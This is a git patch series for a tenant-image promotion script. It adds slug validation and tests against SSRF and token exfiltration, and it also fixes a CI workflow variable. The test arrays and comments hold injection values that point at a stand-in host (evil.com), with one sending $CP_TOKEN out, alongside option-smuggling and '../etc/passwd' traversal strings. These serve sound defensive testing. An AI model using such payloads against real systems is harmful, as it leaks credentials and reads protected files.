From 47aa82f0f29a197b444183b92a353384e1e19e28 Mon Sep 17 00:00:00 2001 From: Molecule AI Core-BE Date: Thu, 14 May 2026 02:46:11 +0000 Subject: [PATCH 1/2] fix(scripts): add slug validation to prevent SSRF + token exfiltration (OFFSEC-006) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit OFFSEC-006: tenant slug interpolated into URLs (cp_redeploy_tenant, tenant_buildinfo, tenant_health, resolve_tenant_instance_id) without validation, enabling SSRF via slug=?url=https://evil.com and token exfiltration via slug=?url=https://evil.com&token=$CP_TOKEN. Changes: - scripts/promote-tenant-image.sh: - Added `set -f` (noglob) at top to prevent glob metacharacter expansion in slug strings before any network call. - Added validate_slug() with RFC-1123 regex ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$ to reject malformed slugs before any URL interpolation. - Added validate_tenants() called after argument parsing (exit 64). - Placed early err() stub before validate_slug to avoid forward-reference. - scripts/test-promote-tenant-image.sh: Added 3 new test groups (13–15): - Test 13: valid slugs (single-char, hyphenated, alphanum) pass. - Test 14: 10 malformed slug patterns rejected before any network call. - Test 15: 6 SSRF + token-exfiltration injection patterns rejected. All 43 tests pass. Closes: molecule-ai/molecule-core#929 Co-Authored-By: Claude Opus 4.7 --- scripts/promote-tenant-image.sh | 54 +++++++++++++++++ scripts/test-promote-tenant-image.sh | 88 ++++++++++++++++++++++++++++ 2 files changed, 142 insertions(+) diff --git a/scripts/promote-tenant-image.sh b/scripts/promote-tenant-image.sh index c8b21b8a..d621fb1d 100755 --- a/scripts/promote-tenant-image.sh +++ b/scripts/promote-tenant-image.sh @@ -54,6 +54,57 @@ # 64 argument/usage error set -euo pipefail +# Disable glob expansion so tenant slugs containing *, ?, [ are treated as +# literals, not filename patterns. This is the primary defence against the +# token-exfiltration attack vector where a malicious slug like +# "evil?url=https://attacker.com?token=$CP_TOKEN" could otherwise expand to +# a list of filenames via pathname expansion. +set -f + +# ───────────────────────────────────────────────────────────────────────────── +# Slug validation (OFFSEC-006) +# ───────────────────────────────────────────────────────────────────────────── +# +# Slugs are interpolated into URL paths (cp_redeploy_tenant, tenant_buildinfo, +# tenant_health, resolve_tenant_instance_id) and ECR identifiers. An unsanitised +# slug can trigger: +# 1. SSRF — slug=https://evil.com?x= injected as URL authority/path segment. +# 2. Token exfiltration — slug=?url=https://evil.com&token=$CP_TOKEN causes +# curl to issue a GET to the attacker's host, leaking the bearer token. +# The guard above (set -f) blocks glob metacharacter expansion; this function +# validates the slug shape so malformed names are rejected before any network +# call is issued. + +# Simple logging helpers — defined early so validate_slug can call err +# before the full Steps block is reached. The real definitions (with full +# timestamps) live in the Steps section and re-declare them idempotently. +err() { printf '[%s] ERROR: %s\n' "$(date -u +%H:%M:%SZ)" "$*" >&2; } + +# Validates a single tenant slug against RFC-1123 + lowercase + max 63 chars. +# arg1 = slug string +# exits 64 if invalid; returns 0 on success. +validate_slug() { + local slug="$1" + # RFC-1123 label: lowercase alphanumeric, single hyphens allowed between chars, + # no leading/trailing hyphen, 1–63 chars total. Also allows single-char slugs. + if [[ ! "$slug" =~ ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$ ]]; then + err "invalid tenant slug: '$slug' (must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$; got '${slug//$'\n'/}')" + return 1 + fi + return 0 +} + +# Validates all tenant slugs from the --tenants argument. +# Called once after argument parsing, before any network call. +validate_tenants() { + local slug + IFS=',' read -ra SLUGS <<<"$TENANTS" + for slug in "${SLUGS[@]}"; do + [[ -z "$slug" ]] && { err "empty slug in --tenants list"; return 1; } + validate_slug "$slug" || return 1 + done + return 0 +} # ───────────────────────────────────────────────────────────────────────────── # Argument parsing @@ -101,6 +152,9 @@ done exit 64 } +# Validate slugs before any network call (OFFSEC-006) +validate_tenants || exit 64 + # Snapshot/rollback tag (deterministic — same script run on same UTC date # is idempotent; cross-day reruns get distinct rollback points). TODAY="${NOW_OVERRIDE_DATE:-$(date -u +%Y%m%d)}" diff --git a/scripts/test-promote-tenant-image.sh b/scripts/test-promote-tenant-image.sh index eac19195..8000942b 100644 --- a/scripts/test-promote-tenant-image.sh +++ b/scripts/test-promote-tenant-image.sh @@ -334,6 +334,94 @@ python3 -c "import sys,json; d=json.loads(sys.stdin.read()); c=d['commands'][0]; && echo " ok: no double-encoding in command string" || { echo " FAIL"; exit 1; } # ───────────────────────────────────────────────────────────────────────────── +printf '\n== Test 13: valid slugs pass validate_tenants ==\n' +m=$(mkmock) +mock_set "$m" aws_ecr_get_image '{}' 0 +mock_set "$m" aws_ecr_describe_image '' 1 +mock_set "$m" aws_ecr_put_image '' 0 +mock_set "$m" cp_redeploy_tenant '{}' 0 +mock_set "$m" tenant_buildinfo '{}' 0 +mock_set "$m" tenant_health 'ok' 0 +out=$(NOW_OVERRIDE_DATE=20260514 SSM_SETTLE_SECONDS=0 \ + "$SCRIPT" --source-tag a --dest-tag b --tenants abc,xy-z,a1b2c3 --mock-dir "$m" 2>&1 + echo "EXIT_CODE=$?") +assert_exit "valid slugs (single-char, hyphenated, alphanum) pass" "$out" 0 +rm -rf "$m" + +printf '\n== Test 14: malformed slugs rejected before any network call (OFFSEC-006) ==\n' +# Patterns that must all be rejected with exit 64 before the first curl/aws call. +# We test a representative sample covering each failure class; if ANY pattern +# passes the validation or makes it into a URL, assert_calls_count will catch +# it (should be 0 for every aws/curl call). +declare -a BAD=( + 'bad slug' # space + 'UpperCase' # uppercase + 'has_underscore' # underscore + 'has.dot' # dot + '-leading-hyphen' # leading hyphen + 'trailing-hyphen-' # trailing hyphen + '!bang' # punctuation + 'query=val' # = character + 'a b c' # spaces + 'A' # uppercase single char +) +bad_count=0 +for bad in "${BAD[@]}"; do + set +e + out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$bad" 2>&1); rc=$? + set -e + if [[ $rc -eq 64 ]] && printf '%s' "$out" | grep -qi 'invalid tenant slug'; then + : # expected + else + bad_count=$((bad_count + 1)) + printf ' ✗ slug=%q should exit 64 with invalid-slug error (got %s)\n' "$bad" "$rc" + fi +done +if [[ $bad_count -eq 0 ]]; then + PASS=$((PASS + 1)); printf ' ✓ all %d malformed slugs rejected before network call\n' "${#BAD[@]}" +else + FAIL=$((FAIL + 1)); FAIL_NAMES+=("malformed-slug rejection") +fi + +printf '\n== Test 15: SSRF + token-exfiltration injection patterns rejected (OFFSEC-006) ==\n' +# These patterns represent the actual OFFSEC-006 attack vectors: a malicious +# slug that, if interpolated into a URL, would cause the script to issue an +# outbound HTTP request to an attacker-controlled host, leaking the CP_TOKEN. +# With set -f (glob off) + validate_slug (RFC-1123 enforcement), all are +# rejected before any network call. We also verify no curl/aws call was made. +declare -a INJECT=( + '?url=https://evil.com' + '?url=https://evil.com?token=$CP_TOKEN' + 'https://evil.com' + '-o-https://evil.com' + '--output=/etc/passwd' + '../etc/passwd' +) +inject_count=0 +for inject in "${INJECT[@]}"; do + m=$(mkmock) + set +e + out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$inject" --mock-dir "$m" 2>&1); rc=$? + set -e + curl_called=0 + aws_called=0 + if grep -qE '^curl ' "$m/.calls" 2>/dev/null; then curl_called=1; fi + if grep -qE '^aws_' "$m/.calls" 2>/dev/null; then aws_called=1; fi + rm -rf "$m" + if [[ $rc -eq 64 ]] && [[ $curl_called -eq 0 ]] && [[ $aws_called -eq 0 ]]; then + : # expected + else + inject_count=$((inject_count + 1)) + printf ' ✗ slug=%q: expected exit 64 + no curl/aws (rc=%s curl=%s aws=%s)\n' \ + "$inject" "$rc" "$curl_called" "$aws_called" + fi +done +if [[ $inject_count -eq 0 ]]; then + PASS=$((PASS + 1)); printf ' ✓ all %d injection slugs rejected before network call\n' "${#INJECT[@]}" +else + FAIL=$((FAIL + 1)); FAIL_NAMES+=("SSRF-injection rejection") +fi + printf '\n────────────────────────────────────\n' if [[ $FAIL -eq 0 ]]; then printf 'All %d tests passed.\n' "$PASS" From 3a430369505348cf32500d71160a7c826d0ebfec Mon Sep 17 00:00:00 2001 From: Molecule AI Core-BE Date: Thu, 14 May 2026 02:49:38 +0000 Subject: [PATCH 2/2] fix(ci): use GITHUB_EVENT_BEFORE in handlers-pg-integ detect-changes The Gitea Actions `github.event.before` template expression evaluates to empty string in shell scripts (Gitea Actions does not expand these objects to JSON strings). Use the shell environment variable `GITHUB_EVENT_BEFORE` instead, which Gitea Actions correctly populates for push events. Same fix as #919 applied to handlers-postgres-integration.yml. Co-Authored-By: Claude Opus 4.7 --- .gitea/workflows/handlers-postgres-integration.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitea/workflows/handlers-postgres-integration.yml b/.gitea/workflows/handlers-postgres-integration.yml index bb4cd81e..ea9e8ed6 100644 --- a/.gitea/workflows/handlers-postgres-integration.yml +++ b/.gitea/workflows/handlers-postgres-integration.yml @@ -90,7 +90,7 @@ jobs: - id: filter # Inline replacement for dorny/paths-filter — see e2e-api.yml. run: | - BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + BASE="${GITHUB_BASE_REF:-${GITHUB_EVENT_BEFORE:-}}" if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then BASE="${{ github.event.pull_request.base.sha }}" fi